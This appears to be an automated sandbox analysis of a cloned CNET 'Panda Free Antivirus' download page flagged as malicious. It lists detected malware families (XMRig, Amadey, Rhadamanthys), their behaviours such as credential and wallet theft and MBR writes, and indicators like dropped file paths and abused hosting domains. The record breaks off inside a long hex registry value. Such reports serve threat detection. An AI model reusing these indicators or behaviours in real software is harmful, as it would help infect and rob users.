Analysis Overview
SHA256
fa05724ca2250316e8ea410d385a3a9f149e7f3678cac1016343174d16827d43
Threat Level: Known bad
The file Panda Free Antivirus - Free download and software reviews - CNET Download.html was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Rhadamanthys
XMRig Miner payload
Stops running service(s)
Blocklisted process makes network request
Creates new service(s)
Downloads MZ/PE file
Reads WinSCP keys stored on the system
Checks computer location settings
UPX packed file
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Executes dropped EXE
Writes to the Master Boot Record (MBR)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Mark of the Web detected: This indicates that the page was originally saved or cloned.
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Checks processor information in registry
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-26 12:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-26 12:05
Reported
2024-03-26 12:26
Platform
win10v2004-20240226-en
Max time kernel
1241s
Max time network
1232s
Command Line
Signatures
Amadey
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2236 created 2384 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin3944 | C:\Windows\system32\sihost.exe |
| PID 2284 created 3496 | N/A | C:\Users\Admin\AppData\Local\Temp\2\Jr.pif | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\3plugin0324 | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Mark of the Web detected: This indicates that the page was originally saved or cloned.
| Description | Indicator | Process | Target |
| N/A | https://olegariohombre.com/ | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2958 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2958 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2958 | N/A |
| N/A | N/A | C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe | N/A |
| N/A | N/A | C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4128 set thread context of 5132 | N/A | C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe | C:\Windows\system32\conhost.exe |
| PID 4128 set thread context of 4104 | N/A | C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe | C:\Windows\system32\dwm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Roaming\services\3plugin0324 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|0" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0 = 4d736f3a3a436865636b73756d52656769737472793a3a446174617c75696e7436345f747c343639373735323330333638363338333139333b456373436f6e666967526573706f6e7365446174617c7b202256657222203a2022696e7433325f747c30222c2022436f6e6649647322203a20227374643a3a77737472696e677c502d522d313039383135382d312d352c502d522d37363735372d312d322c502d522d35343930332d312d332c502d522d32363134362d372d31372c502d442d32393633352d312d312c502d442d32373038372d312d392c502d522d37393638382d312d332c502d522d35333533322d312d352c502d522d35313433362d312d362c502d522d35313432372d31382d31322c502d522d34303436342d31382d392c502d582d39383531382d362d392c502d522d33383339302d31382d32312c626c6f636b6564677261706869637361646170746572353a3437353839392c502d522d33353039392d322d342c502d522d36313430382d31382d332c502d522d35353734362d322d352c502d522d35333531322d312d342c502d522d34363937342d31382d31382c502d522d33383935332d312d31312c502d522d33363535312d31382d31382c502d522d37313431342d312d362c502d522d34303235332d362d31392c502d522d34303235342d362d31382c502d522d33353430312d362d372c502d522d33323130372d32322d32322c502d522d33393134362d31342d31352c502d522d33393134372d31342d32302c502d522d32383534362d362d31312c502d522d32383136352d362d32382c502d522d32343938302d382d34382c502d522d32343339302d352d31322c502d522d31383237392d322d36352c502d442d33343230302d342d352c502d522d35313134352d322d372c502d522d32393932382d322d32302c502d522d36373933322d312d342c502d522d36373230312d312d342c502d522d36343534352d312d342c502d522d36343033352d312d342c502d522d35333531352d31382d392c502d522d35333238302d312d362c502d522d35323234372d312d352c502d522d35313935382d312d352c502d522d35313834322d312d352c502d522d35313237372d322d362c502d522d34373435312d31382d32302c502d522d34353931392d31382d31392c502d522d34353038352d31382d31322c502d522d34313434322d31382d31382c502d522d33383038352d31322d392c502d522d31383734342d362d32322c502d442d33343233392d312d362c502d522d313033343136392d31302d372c502d452d32383637372d322d332c502d522d35353132322d382d382c502d522d35303235352d31302d392c502d522d34343930372d312d392c502d522d34353331342d31302d31362c502d522d34343936352d43312d362c502d452d33383233312d43312d342c502d522d39343536302d31342d31322c502d522d39343138392d31342d31332c502d522d39333838322d31342d32362c502d522d35343732382d31362d32332c502d522d35343639382d31362d31362c502d522d35343635382d31382d31392c502d522d33383330362d31382d332c502d522d33353731372d352d33302c502d522d33343031392d342d332c502d582d35333834352d312d392c502d582d35333737322d312d332c502d582d35313739302d312d332c502d452d34323730302d322d342c502d522d313032353233322d32342d392c502d522d37313335382d312d342c502d522d37303934312d312d342c502d522d36393036352d312d332c502d522d36373136302d312d372c502d522d35393738312d312d342c502d522d35353633312d312d342c502d522d35343231352d312d342c502d522d35333735312d312d342c502d522d35333735322d312d342c502d522d35333532362d312d342c502d522d35323131302d312d342c502d522d34393736352d31352d33322c502d522d34383831382d31372d32352c502d522d35303637392d312d342c502d522d35303438362d31382d31322c502d522d34343833302d31382d31332c502d522d34393431362d342d31342c502d522d34383435372d322d362c502d522d34373937342d31362d31382c502d522d34363534342d31382d31312c502d522d34353630392d31342d362c502d522d34353139372d322d362c502d522d34343034362d31382d31312c502d522d34343031352d31382d32302c502d522d34333732332d322d362c502d522d34313734322d31382d33322c502d522d34303938302d31382d31362c502d522d34303335392d322d31302c502d522d33393032392d352d31382c502d522d33383833352d31382d34382c502d522d33373637362d31382d34362c502d522d33363331302d342d352c502d522d33353934352d31302d352c502d522d33353134332d342d342c502d522d33333535332d342d362c502d522d33333533362d31322d31332c502d522d32393830392d312d372c502d522d32363936382d332d392c66697365723139303a3337373730342c686170707930333137323032302d313a36313937372c686170707930323036323032302d303a32383432382c502d522d35333534352d342d352c502d522d35303731312d31382d31312c502d522d34393733362d362d32322c502d522d34383436372d31382d31382c502d522d33323130362d372d33332c502d522d33303038352d312d392c502d522d32393133382d33382d38332c502d522d32393331352d33362d36392c502d522d32353030392d312d382c502d522d32343336332d312d31332c502d522d32313633312d31302d36342c502d522d31393839382d312d32322c502d522d31393831342d312d36322c502d522d31393031322d312d35372c502d582d313031353535342d312d352c502d582d35303232302d312d332c502d582d34393733302d312d332c502d522d36393334372d312d352c502d522d36343537342d312d342c502d522d35343131362d312d342c502d522d35333538352d31382d31382c502d522d35323539342d31382d352c502d522d35323338362d312d342c502d522d35303938302d322d342c502d522d35303933382d312d342c502d522d35303135322d31382d32302c502d522d34393137352d31382d32322c502d522d34373236302d31382d32332c502d522d34343135362d31382d32362c502d522d34333238342d31382d31392c502d522d34333238352d31322d32322c502d522d34323438322d312d342c502d522d34303939302d31322d31352c502d522d33393333332d31382d32382c502d522d33353433392d31322d32312c502d522d33333231352d31382d31392c502d522d33313335322d31322d32352c502d442d33343236392d322d352c6772736b693435353a3232373433362c67727573653438383a31393737322c677269636f3430363a31393737372c502d522d34393833302d31382d31352c502d522d34303538362d31382d32372c502d522d33323939362d31382d32342c502d442d34303331362d392d352c502d522d35303432392d31382d382c502d522d36353239352d31382d33302c502d522d36313836312d312d342c502d522d36313733372d312d342c502d522d35313737372d31382d382c502d522d35303932302d312d362c502d522d35303336362d31382d31392c502d522d33353938352d31342d32332c502d522d33353839312d31382d352c502d522d33323030342d322d352c502d522d36383333362d322d342c502d522d36373238362d322d362c502d522d35313531332d322d342c502d522d37393936332d312d322c502d522d35323034332d312d332c502d522d35313736342d312d342c502d522d34393338382d322d362c502d522d34383333352d342d31362c502d522d34373330382d332d392c502d522d34323339322d322d342c502d522d33393037332d312d352c502d522d313132333337362d31302d31302c502d522d313030393835352d31322d31342c502d522d39383835362d31382d34382c502d522d33383431302d31382d32322c502d582d313031393538312d312d332c502d582d313030363137342d312d352c502d522d36363433362d312d342c502d522d36323837332d312d342c502d522d35313039372d312d352c502d522d35303730362d31382d372c502d522d35303035352d31382d372c502d522d34393331352d31382d352c502d522d34323636302d31382d33352c502d522d33363634392d382d392c6f656d69633633393a3339373735332c6f65616c6c3834333a3337353838372c502d522d34323337392d322d332c502d522d34323337382d322d332c502d522d36363533392d312d342c502d522d36363533382d312d342c502d522d36353237382d312d342c502d522d36353237392d312d342c502d522d35393138302d312d342c502d522d34383037302d312d352c502d522d34373338362d312d342c502d522d35353334322d322d322c502d522d35333337372d322d362c502d522d35323438312d322d352c502d522d34393735392d322d382c502d522d34363130302d32302d392c502d522d33383531302d322d31302c502d522d33373535302d32302d31332c502d522d33323138362d4332372d32392c502d522d35383133352d322d342c502d522d35363631382d312d332c502d522d35363032372d312d342c502d522d36313731382d31382d332c502d522d34363134352d31382d31382c502d522d33333839322d312d382c502d522d33333639362d312d352c502d522d35353734392d312d342c502d522d35333636322d312d342c502d522d35323234362d312d342c502d522d35323234352d312d342c502d522d35323233382d312d352c502d522d34333634342d362d31332c502d522d33393931322d312d322c502d522d33393238332d342d31302c502d522d35303338302d31382d31382c502d522d35303337392d31382d31372c502d522d36383134362d312d352c502d522d36333430392d312d352c502d522d35303534322d31382d31342c502d522d35303530302d31382d31362c502d522d34383336352d31382d32342c502d522d34383136312d31382d33322c502d522d34363539372d312d342c502d522d33333733372d312d342c502d452d32393636322d322d332c502d522d32393330332d322d32302c502d522d35363635342d322d342c502d522d35333235362d322d31312c502d522d35313730332d312d352c502d522d35303133332d322d392c502d522d34373234322d31382d31312c502d522d34363431302d312d352c502d522d34353535302d31382d34362c502d522d34353439302d31362d392c502d522d34343838352d31382d32302c502d522d34323531322d312d332c502d522d34303136392d382d31332c502d522d33393730302d322d372c502d522d33373331332d31382d32322c502d522d33363636342d342d342c502d522d33353437362d322d352c502d522d33353430372d342d332c502d522d33353233372d31342d31312c502d522d33353135302d322d342c502d522d33353132392d322d342c502d522d33353035362d342d352c502d522d33343838392d382d342c502d522d33343034342d322d342c502d522d33333731382d362d352c502d522d33333435392d312d352c502d522d33303239322d342d372c502d522d32383634342d312d342c502d522d32343033372d312d372c502d522d32333434352d332d372c502d522d32333433342d332d372c502d522d32333430332d332d382c502d522d31383531332d312d33302c502d442d33343639392d342d342c502d442d33343639372d322d342c502d442d33343637352d312d342c502d442d33343637332d312d342c502d442d33343635342d312d342c502d442d33343538372d332d352c502d442d33343236362d312d342c502d442d33343236322d312d352c502d442d33343236302d312d352c502d442d33343235382d322d352c502d442d33323436352d312d352c502d442d33323435392d322d342c502d442d33323435382d352d342c502d582d313038333432372d322d352c502d522d36393532392d312d352c502d522d36353031312d312d332c502d522d35333632322d31382d342c502d522d35303534312d322d372c502d522d34393839332d32322d392c502d522d33363933322d322d31332c6a683861623434373a3338303633332c502d522d36393233322d31382d31332c502d522d32333638312d322d372c502d442d33323530322d322d332c502d442d33323530312d322d332c502d442d33323431352d322d332c502d522d36343531332d31382d31312c502d522d35313931362d38342d33312c502d522d313234353239362d332d352c502d522d313233363935332d322d342c502d522d313137353739332d312d332c502d522d313135373537302d322d342c502d522d313133323832312d322d342c502d522d313132393233342d312d332c502d522d313131393031332d312d332c502d522d313039383739362d312d332c502d522d313039343434352d312d332c502d522d313038303431322d312d332c502d522d313036393736392d322d342c502d522d313036383131352d312d332c502d522d313034353131382d322d342c502d522d32353236392d31342d32312c502d522d313034343430382d312d332c502d522d313034343134312d372d392c502d522d313033373838372d312d332c502d522d313033373837392d312d332c502d522d313033363239332d312d332c502d522d313033363239322d312d332c502d522d313033363238392d322d342c502d522d313033363238382d312d332c502d522d313033363036382d322d342c502d522d313033353933332d322d342c502d522d313033353134392d322d342c502d522d313033333831372d312d332c502d522d313032383136382d312d332c502d522d313030393731372d332d352c502d522d313030303036312d322d342c502d522d3131373534382d322d342c502d522d3131313638322d312d332c502d522d3130353733312d33362d33382c502d522d3130343433352d31332d31352c502d522d3130303239342d312d332c502d522d39393633332d312d332c502d522d39383932392d322d342c502d522d39383235302d312d332c502d522d39343239392d312d332c502d522d39333037372d312d332c502d522d38363131382d312d332c502d522d38303531372d362d382c502d522d37383131322d342d362c502d522d37373134302d322d342c502d522d37363931382d322d342c502d522d37363732312d312d332c502d522d37353434302d322d342c502d522d37333637362d312d332c502d522d37323434392d372d31302c502d522d37323033302d342d362c502d522d36383036392d322d342c502d522d36363937352d312d332c502d522d36353536372d312d332c502d522d36323231322d322d342c502d522d36303630322d332d352c502d522d35323633332d312d332c502d522d35323137312d322d342c502d522d35323031312d322d342c502d522d35313932312d382d31302c502d522d35313235382d382d31302c502d522d35303735322d322d342c502d522d35303638312d322d342c502d522d35303539392d342d362c502d522d35303539362d342d382c502d522d35303535332d312d332c502d522d34393539372d332d352c502d522d34393435382d322d342c502d522d34383533302d372d392c502d522d34373934382d312d342c502d522d34363538302d332d352c502d522d34363438342d31302d31322c502d522d34363132322d312d332c502d522d34353835382d322d342c502d522d34333936362d322d342c502d522d34333530322d31392d32312c502d522d33383234382d31392d32332c502d522d34313433302d312d332c502d522d34303735312d382d31302c502d522d34303237332d342d362c502d522d33393233382d352d372c502d522d33383638322d332d352c502d522d33373538382d322d342c502d522d33343335352d382d31302c502d522d32363236362d342d392c502d522d32363833342d332d382c502d522d32343636322d31362d32322c502d522d32373437392d362d31312c502d522d32363035362d372d31352c502d522d32373030362d372d31322c502d522d33303333382d332d372c502d522d33303137382d37392d38312c502d522d33303035332d382d31302c502d522d32373435382d312d352c502d522d32353832322d31362d31392c502d522d32353038332d362d392c502d522d32343639302d34322d34362c502d522d32343638392d322d352c502d522d32343636362d322d352c502d522d32343636332d362d31312c502d522d32343635392d372d31302c502d522d32333734342d372d392c502d522d32333733392d372d392c502d522d32333733362d31342d31372c502d522d32333733342d372d392c502d522d32333733302d32312d32342c502d522d32333732332d31302d31322c502d442d33323538382d312d332c502d442d33323533342d312d332c502d442d33323532342d312d332c502d442d33323531382d312d332c502d442d33323531322d312d332c502d442d33323530392d312d332c502d442d33323438352d312d342c502d442d33323438342d312d342c502d442d33323430352d312d332c502d522d313038373134312d342d372c502d522d34393136302d31322d31322c502d522d34373630312d31382d31332c502d522d34363833342d31322d31342c502d522d34363230322d31382d31312c502d522d34343031382d31382d31332c502d522d34333335352d31382d31322c502d522d33353333372d31362d372c502d522d33333931362d312d352c502d522d33333538302d382d392c502d582d3131373430302d312d332c502d522d35393137352d31382d342c502d522d35333239322d31342d31302c502d522d34393133302d31382d32332c502d522d34363931332d31382d382c502d522d33373434392d31382d31352c75786d656469756d69636f6e6c756d696e616e63653a3335333435352c502d522d34383534392d31382d31312c502d522d31393236322d312d31322c502d452d34343737342d322d392c502d522d34343836392d31362d31362c502d522d33333931382d312d31312c502d522d313132383633302d312d372c502d522d313039383431322d312d352c502d522d313039313236372d312d34362c502d522d38313732302d312d322c502d522d35383430362d312d352c502d442d35303639372d322d342c502d442d32393731392d312d312c502d442d32393731382d312d312c502d442d32393539332d312d36222c2022434322203a20227374643a3a77737472696e677c4742222c2022446566436f6e667322203a20227374643a3a77737472696e677c6f6673683663326231746c61316133312c6f666372756934797664756c626633312c6f6668706578336a7a6e65706f6f3331222c202245787054696d6522203a2022696e7436345f747c31373131343938393039222c20224554616722203a20227374643a3a77737472696e677c5c226f696678586359473554744c765a6f6f674a3548514a766f483666366f7951674d487069755436784841513d5c22222c202246434d617022203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e4669785468656d654368616e676551727952657061696e74222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4163636573732e4c696e6b65645461626c654d616e616765722e536561726368222c20225622203a2022626f | C:\Program Files\Common Files\Microsoft 